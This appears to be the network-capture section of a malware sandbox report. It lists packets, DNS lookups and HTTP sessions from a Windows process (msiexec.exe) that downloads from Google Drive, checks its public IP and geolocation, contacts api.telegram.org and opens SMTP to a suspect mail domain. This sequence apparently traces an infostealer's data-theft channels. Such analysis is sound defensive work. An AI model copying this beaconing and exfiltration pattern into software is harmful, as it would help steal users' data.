Jan 11, 2025 06:31:37.587764025 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.034514904 CET	443	49980	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.036919117 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.036962986 CET	443	49980	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.167728901 CET	443	49980	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.167918921 CET	443	49980	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.167980909 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.168401003 CET	49980	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.171984911 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.173095942 CET	49981	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.177145958 CET	80	49978	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:38.177211046 CET	49978	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.178005934 CET	80	49981	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:38.178086996 CET	49981	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.178173065 CET	49981	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.183073997 CET	80	49981	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:38.743788004 CET	80	49981	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:38.744256020 CET	49981	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:38.745197058 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.745251894 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.745313883 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.745539904 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:38.745553970 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:38.749279022 CET	80	49981	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:38.749351025 CET	49981	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:39.216991901 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.218439102 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.218477011 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.373081923 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.373172998 CET	443	49982	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.373228073 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.373683929 CET	49982	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.382395029 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:39.388452053 CET	80	49983	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:39.388537884 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:39.388636112 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:39.394853115 CET	80	49983	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:39.951967001 CET	80	49983	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:39.953465939 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.953512907 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.953582048 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.953810930 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:39.953824997 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:39.994064093 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.420619011 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:40.424691916 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:40.424721003 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:40.559474945 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:40.559537888 CET	443	49984	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:40.559581041 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:40.559941053 CET	49984	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:40.562787056 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.563805103 CET	49985	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.567761898 CET	80	49983	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:40.567823887 CET	49983	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.568613052 CET	80	49985	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:40.568682909 CET	49985	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.568742037 CET	49985	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:40.573517084 CET	80	49985	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:41.233630896 CET	80	49985	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:41.234894991 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.234931946 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.235004902 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.235220909 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.235233068 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.275357962 CET	49985	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:41.698436022 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.700334072 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.700362921 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.837460041 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.837538004 CET	443	49986	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:41.837738037 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.838234901 CET	49986	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:41.843470097 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:41.848352909 CET	80	49987	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:41.848459959 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:41.848577023 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:41.853322029 CET	80	49987	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:42.683444023 CET	80	49987	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:42.684777021 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:42.684824944 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:42.684900045 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:42.685125113 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:42.685141087 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:42.728480101 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.160372972 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.161849976 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.161885023 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.315551996 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.315619946 CET	443	49988	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.315732002 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.316176891 CET	49988	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.319467068 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.320502996 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.324388027 CET	80	49987	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:43.324501038 CET	49987	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.325284004 CET	80	49989	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:43.325365067 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.325509071 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:43.330231905 CET	80	49989	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:43.890775919 CET	80	49989	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:43.892209053 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.892261982 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.892327070 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.892615080 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:43.892636061 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:43.931539059 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.364499092 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:44.366271973 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:44.366298914 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:44.494533062 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:44.494591951 CET	443	49990	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:44.494641066 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:44.495002031 CET	49990	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:44.498591900 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.499453068 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.503544092 CET	80	49989	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:44.503596067 CET	49989	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.504352093 CET	80	49991	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:44.504410982 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.504513025 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:44.509295940 CET	80	49991	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:45.303369045 CET	80	49991	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:45.304873943 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.304934025 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.305012941 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.305255890 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.305270910 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.353483915 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.761712074 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.763389111 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.763422012 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.896661043 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.896727085 CET	443	49992	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:45.896817923 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.897238016 CET	49992	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:45.899966955 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.901036024 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.904968023 CET	80	49991	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:45.905056953 CET	49991	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.905880928 CET	80	49993	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:45.905970097 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.906039000 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:45.910754919 CET	80	49993	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:46.473748922 CET	80	49993	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:46.475193977 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:46.475244999 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:46.475332975 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:46.475599051 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:46.475615978 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:46.525321007 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:46.930718899 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:46.935460091 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:46.935525894 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:47.072071075 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:47.072153091 CET	443	49994	104.21.112.1	192.168.2.7
Jan 11, 2025 06:31:47.072309017 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:47.072714090 CET	49994	443	192.168.2.7	104.21.112.1
Jan 11, 2025 06:31:47.098597050 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:47.103749037 CET	80	49993	158.101.44.242	192.168.2.7
Jan 11, 2025 06:31:47.103831053 CET	49993	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:47.106621981 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.106666088 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.106731892 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.107088089 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.107100964 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.714829922 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.715014935 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.716506958 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.716522932 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.716764927 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.718221903 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.759388924 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.956681013 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.956754923 CET	443	49995	149.154.167.220	192.168.2.7
Jan 11, 2025 06:31:47.956847906 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:47.958821058 CET	49995	443	192.168.2.7	149.154.167.220
Jan 11, 2025 06:31:53.677769899 CET	49985	80	192.168.2.7	158.101.44.242
Jan 11, 2025 06:31:54.024746895 CET	49996	465	192.168.2.7	151.80.4.227
Jan 11, 2025 06:31:54.029642105 CET	465	49996	151.80.4.227	192.168.2.7
Jan 11, 2025 06:31:54.029747009 CET	49996	465	192.168.2.7	151.80.4.227

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 06:31:30.437100887 CET	59280	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:30.447191000 CET	53	59280	1.1.1.1	192.168.2.7
Jan 11, 2025 06:31:31.528192997 CET	61108	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:31.537638903 CET	53	61108	1.1.1.1	192.168.2.7
Jan 11, 2025 06:31:35.658828974 CET	50628	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:35.666204929 CET	53	50628	1.1.1.1	192.168.2.7
Jan 11, 2025 06:31:36.749546051 CET	49699	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:36.756611109 CET	53	49699	1.1.1.1	192.168.2.7
Jan 11, 2025 06:31:47.099201918 CET	63923	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:47.106059074 CET	53	63923	1.1.1.1	192.168.2.7
Jan 11, 2025 06:31:53.950643063 CET	52169	53	192.168.2.7	1.1.1.1
Jan 11, 2025 06:31:54.023309946 CET	53	52169	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 06:31:30.437100887 CET	192.168.2.7	1.1.1.1	0x150b	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:31.528192997 CET	192.168.2.7	1.1.1.1	0xb85a	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.658828974 CET	192.168.2.7	1.1.1.1	0xec96	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.749546051 CET	192.168.2.7	1.1.1.1	0xacc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:47.099201918 CET	192.168.2.7	1.1.1.1	0xb13b	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:53.950643063 CET	192.168.2.7	1.1.1.1	0x138f	Standard query (0)	mail.jovannovicvoce.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 06:31:30.447191000 CET	1.1.1.1	192.168.2.7	0x150b	No error (0)	drive.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:31.537638903 CET	1.1.1.1	192.168.2.7	0xb85a	No error (0)	drive.usercontent.google.com		142.250.185.129	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:35.666204929 CET	1.1.1.1	192.168.2.7	0xec96	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:36.756611109 CET	1.1.1.1	192.168.2.7	0xacc	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:47.106059074 CET	1.1.1.1	192.168.2.7	0xb13b	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 11, 2025 06:31:54.023309946 CET	1.1.1.1	192.168.2.7	0x138f	No error (0)	mail.jovannovicvoce.com	jovannovicvoce.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 06:31:54.023309946 CET	1.1.1.1	192.168.2.7	0x138f	No error (0)	jovannovicvoce.com		151.80.4.227	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49978	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:35.675009012 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:31:36.259078979 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e487b7515683845680a3364c6bdd8a39 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:31:36.262938023 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:31:36.422199011 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d1a471081a075ff24d5d8d63d996aad9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 06:31:37.384372950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:31:37.543570042 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bde8167ce60f21b5f1a0c8bd11df12b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49981	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:38.178173065 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:31:38.743788004 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b52f784839c4561d9eab1065a4c610d7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49983	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:39.388636112 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 06:31:39.951967001 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 99ac40a5b586d25a098f9995b37733ba Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49985	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:40.568742037 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 06:31:41.233630896 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 05:31:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9f29b563347ed654107e668cb955d602 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49987	158.101.44.242	80	7376	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 06:31:41.848577023 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
